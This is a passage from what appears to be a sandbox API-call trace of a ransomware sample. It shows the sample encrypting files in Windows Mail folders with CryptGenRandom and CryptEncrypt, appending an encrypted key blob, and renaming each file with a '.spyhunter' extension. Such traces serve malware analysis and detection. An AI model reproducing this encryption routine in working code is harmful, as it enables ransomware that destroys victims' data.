Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0144.234] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.spyhunter") returned 91 [0144.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg.spyhunter")) returned 1 [0144.234] GetProcessHeap () returned 0x2c0000 [0144.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0144.234] GetProcessHeap () returned 0x2c0000 [0144.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0144.234] GetProcessHeap () returned 0x2c0000 [0144.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f65b68 | out: hHeap=0x2c0000) returned 1 [0144.235] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2b0 | out: pbBuffer=0x248f2b0) returned 1 [0144.235] GetProcessHeap () returned 0x2c0000 [0144.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0144.235] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2a8*=0x30) returned 1 [0144.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0144.235] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 84 [0144.235] StrStrW (lpFirst="Hand Prints.htm", lpSrch=".txt") returned 0x0 [0144.235] GetProcessHeap () returned 0x2c0000 [0144.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0144.235] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f26c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f26c*=0xeb, lpOverlapped=0x0) returned 1 [0144.236] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff15, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.236] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xeb, lpNumberOfBytesWritten=0x248f26c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f26c*=0xeb, lpOverlapped=0x0) returned 1 [0144.236] GetProcessHeap () returned 0x2c0000 [0144.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0144.236] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.236] WriteFile (in: hFile=0x9c, lpBuffer=0x248f2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f26c, lpOverlapped=0x0 | out: lpBuffer=0x248f2ac*, lpNumberOfBytesWritten=0x248f26c*=0x4, lpOverlapped=0x0) returned 1 [0144.236] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f26c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f26c*=0x30, lpOverlapped=0x0) returned 1 [0144.237] CloseHandle (hObject=0x9c) returned 1 [0144.237] GetProcessHeap () returned 0x2c0000 [0144.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0144.237] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.spyhunter") returned 94 [0144.237] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm.spyhunter")) returned 1 [0144.237] GetProcessHeap () returned 0x2c0000 [0144.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0144.237] GetProcessHeap () returned 0x2c0000 [0144.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0144.237] GetProcessHeap () returned 0x2c0000 [0144.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3000bd8 | out: hHeap=0x2c0000) returned 1 [0144.238] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2b0 | out: pbBuffer=0x248f2b0) returned 1 [0144.238] GetProcessHeap () returned 0x2c0000 [0144.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0144.238] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2a8*=0x30) returned 1 [0144.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0144.238] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 85 [0144.238] StrStrW (lpFirst="GreenBubbles.jpg", lpSrch=".txt") returned 0x0 [0144.238] GetProcessHeap () returned 0x2c0000 [0144.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0144.238] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f26c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f26c*=0x1906, lpOverlapped=0x0) returned 1 [0144.240] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffe6fa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.240] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1906, lpNumberOfBytesWritten=0x248f26c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f26c*=0x1906, lpOverlapped=0x0) returned 1 [0144.240] GetProcessHeap () returned 0x2c0000 [0144.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0144.240] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.240] WriteFile (in: hFile=0x9c, lpBuffer=0x248f2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f26c, lpOverlapped=0x0 | out: lpBuffer=0x248f2ac*, lpNumberOfBytesWritten=0x248f26c*=0x4, lpOverlapped=0x0) returned 1 [0144.240] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f26c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f26c*=0x30, lpOverlapped=0x0) returned 1 [0144.240] CloseHandle (hObject=0x9c) returned 1 [0144.240] GetProcessHeap () returned 0x2c0000 [0144.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0144.240] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.spyhunter") returned 95 [0144.240] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg.spyhunter")) returned 1 [0144.241] GetProcessHeap () returned 0x2c0000 [0144.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0144.241] GetProcessHeap () returned 0x2c0000 [0144.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0144.241] GetProcessHeap () returned 0x2c0000 [0144.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3000ae0 | out: hHeap=0x2c0000) returned 1 [0144.241] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2a8 | out: pbBuffer=0x248f2a8) returned 1 [0144.241] GetProcessHeap () returned 0x2c0000 [0144.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0144.241] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2a0*=0x30) returned 1 [0144.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0144.242] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 86 [0144.242] StrStrW (lpFirst="Green Bubbles.htm", lpSrch=".txt") returned 0x0 [0144.242] GetProcessHeap () returned 0x2c0000 [0144.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0144.242] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f264, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f264*=0xed, lpOverlapped=0x0) returned 1 [0144.245] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.245] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x248f264, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f264*=0xed, lpOverlapped=0x0) returned 1 [0144.245] GetProcessHeap () returned 0x2c0000 [0144.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0144.245] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.245] WriteFile (in: hFile=0x9c, lpBuffer=0x248f2a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f264, lpOverlapped=0x0 | out: lpBuffer=0x248f2a4*, lpNumberOfBytesWritten=0x248f264*=0x4, lpOverlapped=0x0) returned 1 [0144.245] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f264, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f264*=0x30, lpOverlapped=0x0) returned 1 [0144.245] CloseHandle (hObject=0x9c) returned 1 [0144.245] GetProcessHeap () returned 0x2c0000 [0144.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0144.246] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.spyhunter") returned 96 [0144.246] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm.spyhunter")) returned 1 [0144.246] GetProcessHeap () returned 0x2c0000 [0144.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0144.246] GetProcessHeap () returned 0x2c0000 [0144.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0144.246] GetProcessHeap () returned 0x2c0000 [0144.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30009e8 | out: hHeap=0x2c0000) returned 1 [0144.247] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2a8 | out: pbBuffer=0x248f2a8) returned 1 [0144.247] GetProcessHeap () returned 0x2c0000 [0144.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0144.247] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2a0*=0x30) returned 1 [0144.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0144.247] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 79 [0144.247] StrStrW (lpFirst="Garden.jpg", lpSrch=".txt") returned 0x0 [0144.247] GetProcessHeap () returned 0x2c0000 [0144.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0144.247] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f264, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f264*=0x2800, lpOverlapped=0x0) returned 1 [0144.256] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.256] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f264, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f264*=0x2800, lpOverlapped=0x0) returned 1 [0144.256] GetProcessHeap () returned 0x2c0000 [0144.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0144.257] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.257] WriteFile (in: hFile=0x9c, lpBuffer=0x248f2a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f264, lpOverlapped=0x0 | out: lpBuffer=0x248f2a4*, lpNumberOfBytesWritten=0x248f264*=0x4, lpOverlapped=0x0) returned 1 [0144.262] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f264, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f264*=0x30, lpOverlapped=0x0) returned 1 [0144.263] CloseHandle (hObject=0x9c) returned 1 [0144.263] GetProcessHeap () returned 0x2c0000 [0144.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0144.263] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.spyhunter") returned 89 [0144.263] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg.spyhunter")) returned 1 [0144.263] GetProcessHeap () returned 0x2c0000 [0144.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0144.263] GetProcessHeap () returned 0x2c0000 [0144.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0144.263] GetProcessHeap () returned 0x2c0000 [0144.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f32220 | out: hHeap=0x2c0000) returned 1 [0144.264] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2a0 | out: pbBuffer=0x248f2a0) returned 1 [0144.264] GetProcessHeap () returned 0x2c0000 [0144.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0144.264] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f298*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f298*=0x30) returned 1 [0144.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0144.264] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 78 [0144.264] StrStrW (lpFirst="Bears.htm", lpSrch=".txt") returned 0x0 [0144.264] GetProcessHeap () returned 0x2c0000 [0144.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0144.264] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f25c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f25c*=0xff, lpOverlapped=0x0) returned 1 [0144.265] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.265] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xff, lpNumberOfBytesWritten=0x248f25c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f25c*=0xff, lpOverlapped=0x0) returned 1 [0144.265] GetProcessHeap () returned 0x2c0000 [0144.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0144.265] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.265] WriteFile (in: hFile=0x9c, lpBuffer=0x248f29c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f25c, lpOverlapped=0x0 | out: lpBuffer=0x248f29c*, lpNumberOfBytesWritten=0x248f25c*=0x4, lpOverlapped=0x0) returned 1 [0144.265] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f25c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f25c*=0x30, lpOverlapped=0x0) returned 1 [0144.266] CloseHandle (hObject=0x9c) returned 1 [0144.266] GetProcessHeap () returned 0x2c0000 [0144.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0144.266] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.spyhunter") returned 88 [0144.266] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm.spyhunter")) returned 1 [0144.267] GetProcessHeap () returned 0x2c0000 [0144.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0144.267] GetProcessHeap () returned 0x2c0000 [0144.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0144.267] GetProcessHeap () returned 0x2c0000 [0144.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f31f68 | out: hHeap=0x2c0000) returned 1 [0144.267] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2a0 | out: pbBuffer=0x248f2a0) returned 1 [0144.267] GetProcessHeap () returned 0x2c0000 [0144.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0144.267] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f298*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f298*=0x30) returned 1 [0144.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.267] GetProcessHeap () returned 0x2c0000 [0144.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0144.267] GetProcessHeap () returned 0x2c0000 [0144.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fef5b0 | out: hHeap=0x2c0000) returned 1 [0144.267] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f298 | out: pbBuffer=0x248f298) returned 1 [0144.267] GetProcessHeap () returned 0x2c0000 [0144.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0144.267] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f290*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f290*=0x30) returned 1 [0144.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.268] GetProcessHeap () returned 0x2c0000 [0144.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0144.268] GetProcessHeap () returned 0x2c0000 [0144.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fef4d8 | out: hHeap=0x2c0000) returned 1 [0144.268] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f298 | out: pbBuffer=0x248f298) returned 1 [0144.268] GetProcessHeap () returned 0x2c0000 [0144.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0144.268] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f290*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f290*=0x30) returned 1 [0144.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0144.268] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore") returned 95 [0144.268] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".txt") returned 0x0 [0144.268] GetProcessHeap () returned 0x2c0000 [0144.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0144.268] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f254, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f254*=0x2800, lpOverlapped=0x0) returned 1 [0144.606] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.606] WriteFile (in: hFile=0x9c, 